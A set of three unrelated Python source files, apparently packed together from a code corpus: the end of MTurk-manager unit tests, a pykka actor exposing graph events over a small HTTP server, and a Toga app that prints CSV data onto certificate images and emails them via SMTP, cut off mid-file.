agent_2_object.set_completed_act({})
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_DONE, 2)
# Assert conversation is complete for manager and agents
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
# ensure qualification was 'granted'
self.mturk_utils.find_qualification.assert_called_with(
unique_worker_qual, manager.is_sandbox
)
self.mturk_utils.give_worker_qualification.assert_any_call(
agent_1.worker_id, QUALIFICATION_ID, None, manager.is_sandbox
)
self.mturk_utils.give_worker_qualification.assert_any_call(
agent_2.worker_id, QUALIFICATION_ID, None, manager.is_sandbox
)
# Try to alive with the first agent a second time
agent_1_2 = self.agent_1_2
self.alive_agent(agent_1_2)
assert_equal_by(lambda: agent_1_2.worker_id in self.onboarding_agents, True, 2)
agent_1_2_object = manager.worker_manager.get_agent_for_assignment(
agent_1_2.assignment_id
)
# No worker should be created for a unique task
self.assertIsNone(agent_1_2_object)
def test_break_multi_convo(self):
manager = self.mturk_manager
manager.opt['allowed_conversations'] = 1
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
assert_equal_by(lambda: agent_1.worker_id in self.onboarding_agents, True, 2)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_1.worker_id])
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_1.worker_id] = True
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
# Alive second agent
agent_2 = self.agent_2
self.alive_agent(agent_2)
assert_equal_by(lambda: agent_2.worker_id in self.onboarding_agents, True, 2)
agent_2_object = manager.worker_manager.get_agent_for_assignment(
agent_2.assignment_id
)
self.assertFalse(self.onboarding_agents[agent_2.worker_id])
self.assertEqual(agent_2_object.get_status(), AssignState.STATUS_ONBOARDING)
self.onboarding_agents[agent_2.worker_id] = True
# Assert agents move to task
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_IN_TASK, 2)
assert_equal_by(lambda: agent_2.worker_id in self.worlds_agents, True, 2)
self.assertIn(agent_1.worker_id, self.worlds_agents)
# Attempt to start a new conversation with duplicate worker 1
agent_1_2 = self.agent_1_2
self.alive_agent(agent_1_2)
assert_equal_by(lambda: agent_1_2.worker_id in self.onboarding_agents, True, 2)
agent_1_2_object = manager.worker_manager.get_agent_for_assignment(
agent_1_2.assignment_id
)
# No worker should be created for a unique task
self.assertIsNone(agent_1_2_object)
# Complete agents
self.worlds_agents[agent_1.worker_id] = True
self.worlds_agents[agent_2.worker_id] = True
agent_1_object.set_completed_act({})
agent_2_object.set_completed_act({})
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(agent_2_object.get_status, AssignState.STATUS_DONE, 2)
assert_equal_by(lambda: manager.completed_conversations, 1, 2)
def test_no_onboard_expire_waiting(self):
manager = self.mturk_manager
manager.set_get_onboard_world(None)
# Alive first agent
agent_1 = self.agent_1
self.alive_agent(agent_1)
agent_1_object = manager.worker_manager.get_agent_for_assignment(
agent_1.assignment_id
)
assert_equal_by(agent_1_object.get_status, AssignState.STATUS_WAITING, 2)
manager._expire_agent_pool()
self.assertEqual(agent_1_object.get_status(), AssignState.STATUS_EXPIRED)
if __name__ == '__main__':
unittest.main(buffer=True)
|
logger.py
|
from http.server import HTTPServer, BaseHTTPRequestHandler
import threading
from functools import partial
import pykka
import random
import json
from collections import namedtuple
import enum
EventCreateNode = namedtuple('EventCreateNode', ['node', 'peers', 'distance'])
EventPeersUpdated = namedtuple('EventPeersUpdated', ['node', 'peers', 'distance'])
class GetEvents(enum.Enum):
Nodes = 1
Peers = 2
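# The handler below exposes two polling endpoints: /nodes_created returns the
# nodes logged since the last poll as {'id', 'label'} dicts, and /edges_updated
# returns the latest peer lists per node as {'id', 'from', 'to'} edge dicts.
# The shape of the payloads suggests a vis.js-style graph front end consumes them.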
class HTTPRequestHandler(BaseHTTPRequestHandler):
def __init__(self, logger:pykka.ActorRef, *args, **kwargs):
self.logger:pykka.ActorRef = logger
# BaseHTTPRequestHandler calls do_GET **inside** __init__ !!!
# So we have to call super().__init__ after setting attributes.
super().__init__(*args, **kwargs)
def do_GET(self):
if self.path=="/nodes_created":
nodes = [{'id': event.node , 'label': str(event.node)} for event in self.logger.ask(GetEvents.Nodes)]
# edge = {'from': rnd, 'to': rnd2}
body = json.dumps(nodes)
print(body)
self.create_json_response(nodes)
if self.path=="/edges_updated":
edges = {}
event_dict = self.logger.ask(GetEvents.Peers)
for node_id in event_dict.keys():
# edges[node_id] = [{'id': str(node_id) + '-' + str(peer), 'from': node_id, 'to': peer, 'length': distance} for peer, distance in zip(event_dict[node_id].peers, event_dict[node_id].distance)]
edges[node_id] = [{'id': str(node_id) + '-' + str(peer), 'from': node_id, 'to': peer} for peer, distance in zip(event_dict[node_id].peers, event_dict[node_id].distance)]
body = json.dumps(edges)
print(body)
self.create_json_response(edges)
def create_json_response(self, body):
s_body = json.dumps(body) # convert to string
self.send_response(200)
self.send_header("Content-Length", str(len(s_body)))
self.send_header('Content-Type', 'application/json')
self.send_header("Access-Control-Allow-Origin", "*")
self.end_headers()
self.wfile.write(s_body.encode()) # convert to bytes
def create_server(logger:pykka.ActorRef):
handler = partial(HTTPRequestHandler, logger)
server_address = ('', 8000)
httpd = HTTPServer(server_address, handler)
httpd.serve_forever()
class DataCapture(pykka.ThreadingActor): # used to log events from Nodes
def __init__(self ):
super().__init__()
# start the http server so that data can be accessed from an outside process
self.processThread = threading.Thread(target=create_server, args=(self.actor_ref,), daemon=True) # daemon: thread will die on program termination
self.processThread.start()
# events, changes that happen
self.events_node_created = []
self.events_peers_updated = {}
def on_receive(self, message):
if isinstance(message, EventCreateNode):
self.events_node_created.append(message)
print("logger EventCreateNode: " + str(message.node) + " peers" + str(message.peers))
if isinstance(message, EventPeersUpdated):
self.events_peers_updated[message.node] = message
if isinstance(message, GetEvents):
# when data is fetched, clear current events
if message==GetEvents.Nodes:
events_create_node = self.events_node_created.copy()
self.events_node_created = []
return events_create_node
if message==GetEvents.Peers:
events_peers_updated = self.events_peers_updated.copy()
self.events_peers_updated = {}
return events_peers_updated
return
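# Minimal usage sketch, assuming pykka is installed and port 8000 is free
# (DataCapture binds its HTTP server as soon as the actor is constructed):
# spawn the actor, feed it a couple of fabricated events, then drain them the
# same way the HTTP handler does. The node ids, peers and distances are made up.
if __name__ == "__main__":
    capture = DataCapture.start()  # pykka ActorRef backing the actor
    capture.tell(EventCreateNode(node=1, peers=[2], distance=[0.5]))
    capture.tell(EventPeersUpdated(node=1, peers=[2, 3], distance=[0.5, 1.2]))
    print(capture.ask(GetEvents.Nodes))   # create-node events since the last poll
    print(capture.ask(GetEvents.Peers))   # latest peer updates keyed by node id
    capture.stop()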
|
app.py
|
"""
Application for writing e-certificates
"""
import os
import csv
import time
import toga
import smtplib
from toga.style import Pack
from threading import Thread
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from toga.style.pack import COLUMN, ROW
from PIL import Image, ImageDraw, ImageFont
from email.mime.multipart import MIMEMultipart
class Mailer:
def __init__(self, usr, profile, psk, server="smtp.gmail.com", port=587):
try:
self.server = str(server)
self.port = int(port)
self.mailer = smtplib.SMTP(self.server, self.port)
self.usr = str(usr)
self.profile = str(profile)
self.mailer.ehlo()
self.mailer.starttls()
self.mailer.ehlo()
self.mailer.login(user=self.usr, password=str(psk))
except:
self.mailer = None
def send_mail(self, reciever_maildid, subject, message, image_fp=None):
try:
msg = MIMEMultipart()
if image_fp is not None:
img_data = open(image_fp, "rb").read()
image = MIMEImage(img_data, name=os.path.basename(image_fp))
msg.attach(image)
msg["Subject"] = str(subject) if len(str(subject)) > 0 else "Test Mail"
msg["From"] = f"{self.profile}<{self.usr}>"
msg["To"] = ", ".join([reciever_maildid])
text = MIMEText(str(message) if len(str(message)) > 0 else "Test Mail")
msg.attach(text)
self.mailer.sendmail(self.usr, reciever_maildid, msg.as_string())
return ["mail has been initiated", time.ctime()]
except:
return ["mail failed to send", time.ctime()]
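# Mailer wraps a single authenticated SMTP session (Gmail with STARTTLS by
# default); if the connection or login fails, self.mailer stays None and
# callers check that before sending. A hypothetical call, with placeholder
# addresses, password and file path, would look like:
#   Mailer("me@example.com", "Certificates", "app-password").send_mail(
#       "you@example.com", "Your certificate", "See attachment", "cert.png")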
class CertificAtor(toga.App):
def startup(self):
"""
Construct and show the Toga application.
Usually, you would add your application to a main content box.
We then create a main window (with a name matching the app), and
show the main window.
"""
self.content = {
"st": "Small Text",
"mt": "Medium Text",
"lt": "Large Text",
"x": "X Coordinate",
"y": "Y Coordinate",
"th": "Table Column",
"fs": "Font Size",
"tl": "Character Length",
}
self.headings, self.data, self.write_certificate = None, None, None
(
self.image_file_name,
self.tmp_filen,
self.csv_file_name,
self.font_file_name,
) = ("", "", "", "")
self.image_file_width, self.image_file_height = 1000, 1000
self.coord = {}
self.bnd_box = 0
self.text_list = []
self.left_panel = toga.Box(style=Pack(direction=COLUMN))
self.file_name_label = toga.Label(
"Image File : None", style=Pack(padding=5, flex=1)
)
self.font_label_loc = toga.Label(
"Font File : None", style=Pack(padding=10, flex=1)
)
self.fetch_button = toga.Button(
"Open", id="open", style=Pack(padding=5), on_press=self.fetch
)
self.certificate_box = toga.Box(
style=Pack(direction=ROW, padding=5),
children=[self.file_name_label, self.fetch_button],
)
self.name_container = toga.Box(style=Pack(direction=ROW, padding=5))
self.add_name_button = toga.Button(
"Add Label ", id="add", style=Pack(padding=5, flex=1), on_press=self.fetch
)
self.add_font_file = toga.Button(
"Change Font", id="font", style=Pack(padding=5, flex=1), on_press=self.fetch
)
self.name_box = toga.Box(style=Pack(direction=ROW, padding=5))
self.name_scroller = toga.ScrollContainer(
style=Pack(flex=1), content=self.name_box
)
self.image_view = toga.ImageView(style=Pack(flex=1, padding=5))
self.image_tool = toga.SplitContainer(
id="image_tool",
style=Pack(flex=1, padding=5),
content=[self.image_view, self.name_scroller],
)
self.send_emails = toga.Button(
"Send Email",
id="emails",
style=Pack(padding=5, flex=1),
enabled=True,
on_press=self.get_mail_window,
)
self.open_csv = toga.Button(
"Select a CSV File",
id="open_csv",
style=Pack(padding=5, flex=1),
enabled=False,
on_press=self.fetch,
)
self.write_certificate = toga.Button(
"Write Certificate",
id="",
style=Pack(padding=5, flex=1),
enabled=False,
on_press=self.write_interface,
)
self.bottom_button_box = toga.Box(
style=Pack(padding=5, direction=ROW),
children=[
self.add_name_button,
self.add_font_file,
self.open_csv,
self.write_certificate,
self.send_emails,
],
)
self.loading = toga.ProgressBar(style=Pack(padding=5))
self.left_panel.add(
self.image_tool,
self.loading,
self.name_container,
self.certificate_box,
self.font_label_loc,
self.bottom_button_box,
)
self.main_window = toga.MainWindow(title=self.formal_name)
self.csv_window = toga.Window(title=self.formal_name, closeable=False)
self.main_window.content = self.left_panel
self.csv_window.content = toga.Box(style=Pack(direction=COLUMN, padding=5))
self.csv_window.show()
self.main_window.show()
def fetch(self, widget):
if widget.id == "open" or (widget.id == "add" and self.image_file_name == ""):
temp = self.main_window.open_file_dialog(
"Select a Image File", file_types=["jpg", "png"]
)
self.image_file_name = (
str(temp) if temp is not None else self.image_file_name
)
self.file_name_label.text = "Image File : " + self.image_file_name
if self.image_file_name != "":
self.tmp_filen = f"{self.image_file_name}_temp.jpg"
self.image_view.image = toga.Image(self.image_file_name)
im = Image.open(self.image_file_name)
self.image_file_width, self.image_file_height = im.size
del im
if widget.id == "font" or (widget.id == "add" and self.font_file_name == ""):
temp = self.main_window.open_file_dialog(
"Select a ttf File", file_types=["ttf"]
)
self.font_file_name = str(temp) if temp is not None else self.font_file_name
self.font_label_loc.text = "Font File : " + self.font_file_name
if widget.id == "open_csv" or (widget.id == "add" and self.csv_file_name == ""):
temp = self.main_window.open_file_dialog(
title="Select the csv file", file_types=["csv"]
)
self.csv_file_name = str(temp) if temp is not None else self.csv_file_name
self.get_right_panel()
if widget.id == "add":
if self.tmp_filen != "" and self.font_file_name != "":
if not self.open_csv.enabled:
self.open_csv.enabled = True
box = toga.Box(
id=f"bnd_box_{self.bnd_box}",
style=Pack(padding=5, direction=COLUMN),
)
label = toga.Label(
"Text:", id=f"textlabel_{self.bnd_box}", style=Pack(padding=5)
)
items = (
[""] + list(self.headings.keys())
if self.headings is not None
else []
)
self.text_list.append(
toga.TextInput(id=f"lin_{self.bnd_box}", style=(Pack(padding=5)))
)
table_label = toga.Selection(
id=f"tbl_{self.bnd_box}",
style=Pack(padding=5),
enabled=False if len(items) == 0 else True,
items=items,
on_select=self.teleport,
)
stl = toga.Label(
"Small Text Length : 0 chars",
id=f"stl_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=190),
)
stl_in = toga.Slider(
id=f"stlin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 255),
on_slide=self.teleport,
)
sts = toga.Label(
"Small Font Size : 0 pts",
id=f"sts_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=150),
)
sts_in = toga.Slider(
id=f"stsin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 100),
on_slide=self.teleport,
)
stx = toga.Label(
"x : 0", id=f"stx_{self.bnd_box}", style=Pack(padding=5, width=45)
)
sty = toga.Label(
"y : 0", id=f"sty_{self.bnd_box}", style=Pack(padding=5, width=45)
)
stx_in = toga.Slider(
id=f"stxin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_width),
on_slide=self.teleport,
)
sty_in = toga.Slider(
id=f"styin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_height),
on_slide=self.teleport,
)
stborder_line = toga.Divider(
id=f"bhst_{self.bnd_box}",
style=Pack(padding=5, height=2, width=100, flex=1),
)
mtl = toga.Label(
"Medium Text Length : 0 chars",
id=f"mtl_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=200),
)
mtl_in = toga.Slider(
id=f"mtlin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 255),
on_slide=self.teleport,
)
mts = toga.Label(
"Medium Font Size : 0 pts",
id=f"mts_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=160),
)
mts_in = toga.Slider(
id=f"mtsin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 100),
on_slide=self.teleport,
)
mtx = toga.Label(
"x : 0", id=f"mtx_{self.bnd_box}", style=Pack(padding=5, width=45)
)
mty = toga.Label(
"y : 0", id=f"mty_{self.bnd_box}", style=Pack(padding=5, width=45)
)
mtx_in = toga.Slider(
id=f"mtxin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_width),
on_slide=self.teleport,
)
mty_in = toga.Slider(
id=f"mtyin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_height),
on_slide=self.teleport,
)
mtborder_line = toga.Divider(
id=f"bhmt_{self.bnd_box}", style=Pack(padding=5, height=5, flex=1)
)
ltl = toga.Label(
"Large Text Length : 0 chars",
id=f"ltl_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=190),
)
ltl_in = toga.Slider(
id=f"ltlin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 255),
on_slide=self.teleport,
)
lts = toga.Label(
"Large Font Size : 0 pts",
id=f"lts_{self.bnd_box}",
style=Pack(padding=(5, 1, 5, 10), width=150),
)
lts_in = toga.Slider(
id=f"ltsin_{self.bnd_box}",
style=Pack(padding=(5, 10, 5, 1)),
default=0,
range=(0, 100),
on_slide=self.teleport,
)
ltx = toga.Label(
"x : 0", id=f"ltx_{self.bnd_box}", style=Pack(padding=5, width=45)
)
lty = toga.Label(
"y : 0", id=f"lty_{self.bnd_box}", style=Pack(padding=5, width=45)
)
ltx_in = toga.Slider(
id=f"ltxin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_width),
on_slide=self.teleport,
)
lty_in = toga.Slider(
id=f"ltyin_{self.bnd_box}",
style=Pack(padding=5),
default=10,
range=(0, self.image_file_height),
on_slide=self.teleport,
)
ltborder_line = toga.Divider(
id=f"bhlt_{self.bnd_box}", style=Pack(padding=5, height=5, flex=1)
)
box.add(
label,
self.text_list[self.bnd_box],
table_label,
stl,
stl_in,
sts,
sts_in,
stx,
stx_in,
sty,
sty_in,
stborder_line,
mtl,
mtl_in,
mts,
mts_in,
mtx,
mtx_in,
mty,
mty_in,
mtborder_line,
ltl,
ltl_in,
lts,
lts_in,
ltx,
ltx_in,
lty,
lty_in,
ltborder_line,
)
box_border_line = toga.Divider(
id=f"bv_{self.bnd_box}", direction=toga.Divider.VERTICAL
)
self.coord.update(
{
self.bnd_box: {
"st": {"x": 0, "y": 0, "fs": 0, "tl": 0},
"mt": {"x": 0, "y": 0, "fs": 0, "tl": 0},
"lt": {"x": 0, "y": 0, "fs": 0, "tl": 0},
"th": "",
}
}
)
self.name_box.add(box, box_border_line)
self.bnd_box += 1
self.name_scroller.content = self.name_box
else:
self.fetch(widget)
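# teleport is the single callback for every slider, selection and table cell in
# the label panel. The widget id encodes what changed: the suffix after "_" is
# the label block index, and the prefix picks the field, e.g. "stxin"/"styin"
# move the small-text x/y, "mtsin" sets the medium font size, "ltlin" sets the
# large-text length cutoff, "tbl" binds a CSV column and "sheet" previews a row.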
def teleport(self, widget, row=None):
if len(self.image_file_name) != 0 and len(self.font_file_name):
key = int(widget.id.split("_")[-1]) if "_" in widget.id else 0
value = (
int(widget.value)
if (row == None and "." in str(widget.value))
else row.__dict__
if row != None
else widget.value
)
boxes = self.name_box.children
change = False
size = None
(
stx_label,
sty_label,
mtx_label,
mty_label,
ltx_label,
lty_label,
stl_label,
mtl_label,
ltl_label,
sts_label,
mts_label,
lts_label,
) = (None, None, None, None, None, None, None, None, None, None, None, None)
for box in boxes:
ctrls = box.children
for _label in ctrls:
if _label.id == f"stx_{key}":
stx_label = _label
elif _label.id == f"sty_{key}":
sty_label = _label
elif _label.id == f"mtx_{key}":
mtx_label = _label
elif _label.id == f"mty_{key}":
mty_label = _label
elif _label.id == f"ltx_{key}":
ltx_label = _label
elif _label.id == f"lty_{key}":
lty_label = _label
elif _label.id == f"stl_{key}":
stl_label = _label
elif _label.id == f"mtl_{key}":
mtl_label = _label
elif _label.id == f"ltl_{key}":
ltl_label = _label
elif _label.id == f"sts_{key}":
sts_label = _label
elif _label.id == f"mts_{key}":
mts_label = _label
elif _label.id == f"lts_{key}":
lts_label = _label
if widget.id.startswith("stxin") and self.coord[key]["st"]["x"] != value:
if stx_label != None:
stx_label.text = f"x : {value}"
self.coord[key]["st"]["x"] = value
size = "st"
change = True
elif widget.id.startswith("styin") and self.coord[key]["st"]["y"] != value:
if sty_label != None:
sty_label.text = f"y : {value}"
self.coord[key]["st"]["y"] = value
size = "st"
change = True
elif widget.id.startswith("mtxin") and self.coord[key]["mt"]["x"] != value:
if mtx_label != None:
mtx_label.text = f"x : {value}"
self.coord[key]["mt"]["x"] = value
size = "mt"
change = True
elif widget.id.startswith("mtyin") and self.coord[key]["mt"]["y"] != value:
if mty_label != None:
mty_label.text = f"y : {value}"
self.coord[key]["mt"]["y"] = value
size = "mt"
change = True
elif widget.id.startswith("ltxin") and self.coord[key]["lt"]["x"] != value:
if ltx_label != None:
ltx_label.text = f"x : {value}"
self.coord[key]["lt"]["x"] = value
size = "lt"
change = True
elif widget.id.startswith("ltyin") and self.coord[key]["lt"]["y"] != value:
if lty_label != None:
lty_label.text = f"y : {value}"
self.coord[key]["lt"]["y"] = value
size = "lt"
change = True
elif widget.id.startswith("stlin") and self.coord[key]["st"]["tl"] != value:
if stl_label != None:
stl_label.text = f"Small Text Length : {value} chars"
self.coord[key]["st"]["tl"] = value
elif widget.id.startswith("mtlin") and self.coord[key]["mt"]["tl"] != value:
if mtl_label != None:
mtl_label.text = f"Medium Text Length : {value} chars"
self.coord[key]["mt"]["tl"] = value
elif widget.id.startswith("ltlin") and self.coord[key]["lt"]["tl"] != value:
if ltl_label != None:
ltl_label.text = f"Large Text Length : {value} chars"
self.coord[key]["lt"]["tl"] = value
elif widget.id.startswith("stsin") and self.coord[key]["st"]["fs"] != value:
if sts_label != None:
sts_label.text = f"Small Font Size : {value} pts"
self.coord[key]["st"]["fs"] = value
size = "st"
change = True
elif widget.id.startswith("mtsin") and self.coord[key]["mt"]["fs"] != value:
if mts_label != None:
mts_label.text = f"Medium Font Size : {value} pts"
self.coord[key]["mt"]["fs"] = value
size = "mt"
change = True
elif widget.id.startswith("ltsin") and self.coord[key]["lt"]["fs"] != value:
if lts_label != None:
lts_label.text = f"Large Font Size : {value} pts"
self.coord[key]["lt"]["fs"] = value
size = "lt"
change = True
elif widget.id.startswith("tbl") and self.coord[key]["th"] != value:
self.coord[key]["th"] = str(value)
elif widget.id == "sheet":
for place_holder, l_index in zip(self.text_list, self.coord):
if self.coord[l_index]["th"] != "":
place_holder.value = value[
self.headings[self.coord[l_index]["th"]]
]
change = True
key = l_index
self.name_box.refresh()
self.update_canvas(change, key, size)
def update_canvas(self, change, key, size=None):
if change and len(self.text_list[key].value) > 0:
img = Image.open(self.image_file_name)
new_image = ImageDraw.Draw(img)
for _key in self.coord:
if _key == key and size is not None:
font_face = ImageFont.truetype(
self.font_file_name, self.coord[_key][size]["fs"]
)
new_image.text(
[self.coord[_key][size]["x"], self.coord[_key][size]["y"]],
self.text_list[_key].value,
font=font_face,
)
else:
font_face = ImageFont.truetype(
self.font_file_name, self.coord[_key]["mt"]["fs"]
)
new_image.text(
[self.coord[_key]["mt"]["x"], self.coord[_key]["mt"]["y"]],
self.text_list[_key].value,
font=font_face,
)
del font_face
img.save(self.tmp_filen)
self.image_view.image = toga.Image(self.tmp_filen)
def get_right_panel(self):
right_panel = toga.Box(style=Pack(flex=1, direction=COLUMN))
if self.csv_file_name != "":
with open(self.csv_file_name, "r") as file_object:
reader = csv.reader(file_object)
temp = [row for row in reader]
heading_present = self.main_window.question_dialog(
"CSV File Configuration", "Does the CSV file have a heading row?"
)
if not heading_present:
self.headings = {
f"Column {_index}": f"column_{_index}"
for _index, label in enumerate(temp[0], 1)
}
self.data = temp[0:]
else:
self.headings = {
label: ("_" + label.replace(" ", "_")).lower()
if " " in label
else ("_" + label).lower()
for label in temp[0]
}
self.data = temp[1:]
csv_widget = toga.Table(
id="sheet",
headings=list(self.headings.keys()),
data=self.data,
style=Pack(flex=1, padding=5),
on_select=self.teleport,
accessors=list(self.headings.values()),
)
for box in self.name_box.children:
ctrls = box.children
for _label in ctrls:
if _label.id.startswith("tbl_"):
_label.items = [""] + list(self.headings.keys())
_label.enabled = True
if _label.id.startswith("lin_"):
_label.value = ""
self.write_certificate.enabled = True
else:
csv_widget = toga.Table(
id="sheet", headings=[], style=Pack(flex=1, padding=5)
)
right_panel.add(csv_widget)
self.csv_window.content = right_panel
self.csv_window.show()
def write_interface(self, widget):
message = "Writing Options"
self.consolidated = {}
# confirm the label headers
for _index in self.coord:
consolidated = {}
message += f"\nLabel {_index+1} "
for _key in self.coord[_index]:
if _key != "th" and self.coord[_index][_key]["fs"] == 0:
continue
if _key == "th" and (
self.coord[_index]["st"]["fs"] != 0
or self.coord[_index]["mt"]["fs"] != 0
or self.coord[_index]["lt"]["fs"] != 0
):
consolidated.update(
{
_key: list(self.headings.keys()).index(
self.coord[_index][_key]
)
}
)
message += (
f"\n\t-> {self.content[_key]} : {self.coord[_index][_key]}"
)
continue
else:
consolidated.update({_key: self.coord[_index][_key]})
message += f"\n\t-> Category : {self.content[_key]}"
for _sub_key in self.coord[_index][_key]:
message += f"\n\t\t-> {self.content[_sub_key]} : {self.coord[_index][_key][_sub_key]}"
message += "\n"
self.consolidated.update({_index: consolidated})
go_ahead = self.main_window.confirm_dialog(
title="Write Confirmation", message=message
)
if go_ahead:
self.destination_folder = self.main_window.select_folder_dialog(
title="Select destination folder"
)
self.destination_folder = self.destination_folder[0]
# self.thread = Thread(target=self.write_certificates, daemon=True)
# self.thread.start()
self.write_certificates()
if self.csv_log_file_name != "":
self.get_mail_window(None)
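# write_certificates renders one certificate per CSV row: for each configured
# label it picks the small, medium or large placement whose character-length
# cutoff ("tl") the cell value falls under, draws the text in the chosen font
# size, saves "<row number>.<values>.png" into the destination folder, and logs
# every row plus the written file path to a "*_file_log.csv" beside the source CSV.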
def write_certificates(self):
to_write = {}
self.csv_log_file_name = ""
logs = []
flag = False
self.loading.max = len(self.data)
self.loading.start()
for sno, row in enumerate(self.data, 1):
to_write = {
_label: row[self.consolidated[_label]["th"]]
for _label in self.consolidated
}
image = Image.open(self.image_file_name)
new_image = ImageDraw.Draw(image)
for label in to_write:
font_face = ""
# build cases
if (
"st" in self.consolidated[label].keys()
and len(to_write[label]) <= self.consolidated[label]["st"]["tl"]
):
font_face = ImageFont.truetype(
self.font_file_name, self.consolidated[label]["st"]["fs"]
)
new_image.text(
[
self.consolidated[label]["st"]["x"],
self.consolidated[label]["st"]["y"],
],
to_write[label],
font=font_face,
)
if (
"mt" in self.consolidated[label].keys()
and self.consolidated[label]["st"]["tl"]
< len(to_write[label])
<= self.consolidated[label]["mt"]["tl"]
):
font_face = ImageFont.truetype(
self.font_file_name, self.consolidated[label]["mt"]["fs"]
)
new_image.text(
[
self.consolidated[label]["mt"]["x"],
self.consolidated[label]["mt"]["y"],
],
to_write[label],
font=font_face,
)
if (
"lt" in self.consolidated[label].keys()
and self.consolidated[label]["mt"]["tl"]
< len(to_write[label])
<= self.consolidated[label]["lt"]["tl"]
):
font_face = ImageFont.truetype(
self.font_file_name, self.consolidated[label]["lt"]["fs"]
)
new_image.text(
[
self.consolidated[label]["lt"]["x"],
self.consolidated[label]["lt"]["y"],
],
to_write[label],
font=font_face,
)
del font_face
fn = f'{sno}.{"_".join(list(to_write.values()))}.png'
written_certificate_name = os.path.join(self.destination_folder, fn)
image.save(written_certificate_name)
temp = row + [os.path.abspath(written_certificate_name)]
logs.append(temp)
self.loading.value = sno
# log to file
if self.csv_file_name != "":
self.csv_log_file_name = (
str(
self.csv_file_name
if self.csv_file_name != ""
else f"temp_{time.ctime()}.csv"
).split(".csv")[0]
+ "_file_log.csv"
)
with open(self.csv_log_file_name, "w") as csv_log_fp:
csv_logger = csv.writer(csv_log_fp)
csv_logger.writerows(logs)
self.loading.stop()
self.loading.value = 0
def get_mail_window(self, widget):
if widget != None:
temp = self.main_window.open_file_dialog(
"Select a csv file with mail ids", file_types=["csv"]
)
if temp is not None:
self.csv_log_file_name = str(temp)
else:
return
go_ahead = self.main_window.question_dialog(
title="Send Emails",
message=f"Do you want to use the mail ids from the following file?\n{self.csv_log_file_name}",
)
if go_ahead:
with open(self.csv_log_file_name, "r") as file_object:
reader = csv.reader(file_object)
temp = [row for row in reader]
heading_present = self.main_window.question_dialog(
"CSV File Configuration", "Does the CSV file have a heading row?"
)
if not heading_present:
self.email_headings = {
f"Column {_index+1}": _index
for _index, label in enumerate(temp[0], 0)
}
self.email_data = temp
else:
self.email_headings = {
label: _index for _index, label in enumerate(temp[0], 0)
}
self.email_data = temp[1:]
self.mail_id_label = toga.Label(
text="Mail Id : ", id="mail_id", style=Pack(padding=10)
)
self.mail_id_usin = toga.TextInput(
id="mailid_in", style=Pack(padding=10, flex=1)
)
self.mail_id_box = toga.Box(
id="mail_box",
style=Pack(flex=1, padding=5),
children=[self.mail_id_label, self.mail_id_usin],
)
self.mail_pn_label = toga.Label(
text="Profile Name : ", id="mail_pn", style=Pack(padding=10)
)
self.mail_pn_usin = toga.TextInput(
id="mailpn_in", style=Pack(padding=10, flex=1)
)
self.mail_pn_box = toga.Box(
id="mail_box",
style=Pack(flex=1, padding=5),
children=[self.mail_pn_label, self.mail_pn_usin],
)
self.pass_label = toga.Label(
text="Password : ", id="pass", style=Pack(padding=10)
)
self.pass_usin = toga.PasswordInput(
id="pass_in", style=Pack(padding=10, flex=1)
)
self.pass_box = toga.Box(
id="pass_box",
style=Pack(flex=1, padding=5),
children=[self.pass_label, self.pass_usin],
)
self.sub_label = toga.Label(
text="Subject : ", id="subject", style=Pack(padding=10)
)
self.sub_usin = toga.TextInput(id="sub_in", style=Pack(padding=10, flex=1))
self.sub_box = toga.Box(
id="sub_box",
style=Pack(flex=1, padding=5),
children=[self.sub_label, self.sub_usin],
)
self.image_column_index = toga.Selection(
id="image_column_in",
style=Pack(padding=10, flex=1),
items=["Image Column Name"] + list(self.email_headings.keys()),
)
self.email_column_index = toga.Selection(
id="email_column_in",
style=Pack(padding=10, flex=1),
items=["Email Column Name"] + list(self.email_headings.keys()),
)
self.mess_usin = toga.MultilineTextInput(
id="mess_in", style=Pack(padding=10, flex=1), initial="Content of mail"
)
self.email_pb = toga.ProgressBar(
id="email_pb", style=Pack(padding=10, flex=1)
)
self.sm_button = toga.Button(
label="Send Mail",
id="sendmail",
style=Pack(padding=10, flex=1),
on_press=self.send_mail,
)
self.st_button = toga.Button(
label="Send Test Mail",
id="sendtestmail",
style=Pack(padding=10, flex=1),
on_press=self.send_mail,
)
self.cm_button = toga.Button(
label="Cancel",
id="cancelmail",
style=Pack(padding=10, flex=1),
on_press=self.send_mail,
)
self.mess_box = toga.Box(
id="mess_box",
style=Pack(flex=1, padding=5, direction=COLUMN),
children=[
self.image_column_index,
self.email_column_index,
self.mess_usin,
self.email_pb,
self.sm_button,
self.st_button,
self.cm_button,
],
)
self.mail_content_box = toga.Box(
id="mail_content_box",
style=Pack(direction=COLUMN, flex=1),
children=[
self.mail_pn_box,
self.mail_id_box,
self.pass_box,
self.sub_box,
self.mess_box,
],
)
self.email_window = toga.Window(
